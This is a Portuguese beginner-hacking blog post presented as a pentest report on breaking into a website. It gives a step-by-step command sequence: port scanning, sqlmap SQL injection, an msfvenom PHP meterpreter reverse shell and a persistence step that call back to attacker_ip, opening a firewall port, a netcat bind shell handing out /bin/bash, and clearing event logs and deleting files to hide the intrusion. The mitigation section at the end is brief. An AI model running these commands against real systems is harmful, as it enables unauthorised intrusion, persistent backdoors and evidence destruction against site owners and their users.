Pesquisar este blog
Bem-vindo ao Pentest Noob, o seu guia amigável para iniciar no mundo do hacking ético e segurança cibernética. Se você é novo neste campo empolgante ou apenas está começando a explorar as possibilidades do hacking, você veio ao lugar certo. Nosso blog é projetado especialmente para iniciantes, oferecendo recursos, tutoriais e dicas para ajudá-lo a dar os primeiros passos na jornada de se tornar um pentester, hack, programador!
Destaques
- Gerar link
- X
- Outros aplicativos
Relatório Técnico: Tipos de Redes, Portas Lógicas e suas Vulnerabilidades
1. Introdução
Este relatório descreve um cenário de pentest onde um site é invadido, uma backdoor é instalada para acesso remoto e uma porta secundária é explorada para manter o acesso persistente. O objetivo é identificar vulnerabilidades, demonstrar como elas podem ser exploradas e fornecer recomendações para mitigação.
2. Metodologia de Pentest
2.1. Coleta de Informações
Objetivo: Identificar o site e suas tecnologias.
Ferramentas: Nmap, WhatWeb, Wappalyzer.
Passos:
Realizar uma varredura de portas para identificar serviços ativos.
Identificar o sistema operacional e tecnologias utilizadas (ex: Apache, PHP, MySQL).
2.2. Exploração de Vulnerabilidades
Objetivo: Identificar e explorar vulnerabilidades para obter acesso inicial.
Ferramentas: Metasploit, SQLmap, Burp Suite.
Passos:
Testar vulnerabilidades comuns, como Injeção de SQL ou XSS.
Explorar a vulnerabilidade para obter acesso ao servidor.
2.3. Criação de Backdoor
Objetivo: Instalar uma backdoor para acesso remoto.
Ferramentas: Metasploit, Netcat, Shells web.
Passos:
Utilizar uma vulnerabilidade para carregar uma shell reversa.
Configurar a backdoor para persistência.
2.4. Exploração de Porta Secundária
Objetivo: Manter o acesso ao sistema através de uma porta secundária.
Ferramentas: SSH, Netcat.
Passos:
Abrir uma porta secundária no firewall.
Configurar um serviço para escutar na porta secundária.
2.5. Limpeza de Rastros
Objetivo: Remover evidências da invasão.
Ferramentas: Comandos do sistema operacional.
Passos:
Limpar logs de acesso.
Remover arquivos temporários.
3. Exemplo Prático de Pentest
3.1. Coleta de Informações
Varredura de Portas:
(nmap -sV -p- target.com)
Identifica serviços ativos e versões.
Identificação de Tecnologias:
(whatweb target.com)
Identifica o servidor web e tecnologias utilizadas.
3.2. Exploração de Vulnerabilidades
Injeção de SQL:
Utilizar o SQLmap para explorar uma vulnerabilidade de injeção de SQL.
(sqlmap -u "http://target.com/login" -- )(data="username=admin&password=pass" --dbs)
Extrair dados do banco de dados.
Upload de Arquivo Malicioso:
Explorar uma falha de upload para carregar uma shell web.
(msfvenom -p php/meterpreter/reverse_tcp LHOST=attacker_ip) (LPORT=4444 -f raw > shell.php)
Fazer upload do arquivo shell.php para o servidor.
3.3. Criação de Backdoor
Shell Reversa:
Configurar o Metasploit para receber a conexão reversa.
(msfconsole)
(use exploit/multi/handler)
(set payload php/meterpreter/reverse_tcp)
(set LHOST attacker_ip)
(set LPORT 4444)
(exploit)
Acessar o arquivo shell.php no servidor para iniciar a conexão reversa.
Persistência:
Criar um serviço para manter o acesso.
(meterpreter > run persistence -X -i 60 -p 4444 -r attacker_ip)
3.4. Exploração de Porta Secundária
Abrir Porta Secundária:
Abrir uma porta no firewall.
(iptables -A INPUT -p tcp --dport 2222 -j ACCEPT)
Configurar Serviço:
Utilizar o Netcat para escutar na porta secundária.
(nc -lvp 2222 -e /bin/bash)
3.5. Limpeza de Rastros
Limpar Logs:
(meterpreter > clearev)
Remover Arquivos Temporários:
(rm -rf /tmp/shell.php)
4. Vulnerabilidades Identificadas
4.1. Injeção de SQL
Descrição: Falha que permite a execução de comandos SQL maliciosos.
Impacto: Acesso não autorizado a dados sensíveis.
4.2. Upload de Arquivo Malicioso
Descrição: Falha que permite o upload de arquivos maliciosos.
Impacto: Execução de código malicioso no servidor.
4.3. Falhas de Configuração de Firewall
Descrição: Configurações inadequadas de firewall.
Impacto: Acesso não autorizado através de portas secundárias.
5. Recomendações de Mitigação
5.1. Validação de Entradas
Validar e sanitizar todas as entradas de usuário.
5.2. Restrição de Uploads
Validar e restringir tipos de arquivos permitidos.
5.3. Configuração Adequada de Firewall
Configurar o firewall para bloquear portas desnecessárias.
5.4. Monitoramento de Logs
Monitorar logs de acesso para detectar atividades suspeitas.
5.5. Atualização de Software
Manter o software e bibliotecas atualizados.
6. Conclusão
Este relatório demonstrou como um site pode ser invadido, uma backdoor pode ser instalada e uma porta secundária pode ser explorada para manter o acesso persistente. A identificação e correção dessas vulnerabilidades são essenciais para proteger os sites e os dados dos usuários. Recomenda-se a implementação de práticas de segurança robustas, como validação de entradas, restrição de uploads e configuração adequada de firewalls.
Copyright © 2025 (@zxyurikauan). Todos os direitos reservados
Postagens mais visitadas
Lista de proxy Parte: 2
- Gerar link
- X
- Outros aplicativos
Como fazer um ATACK de força bruta em um wi-fi (Kali Linux)
- Gerar link
- X
- Outros aplicativos
Guia Prático para Testes de Penetração com OWASP ZAP no Kali Linux
- Gerar link
- X
- Outros aplicativos
Comentários
Postar um comentário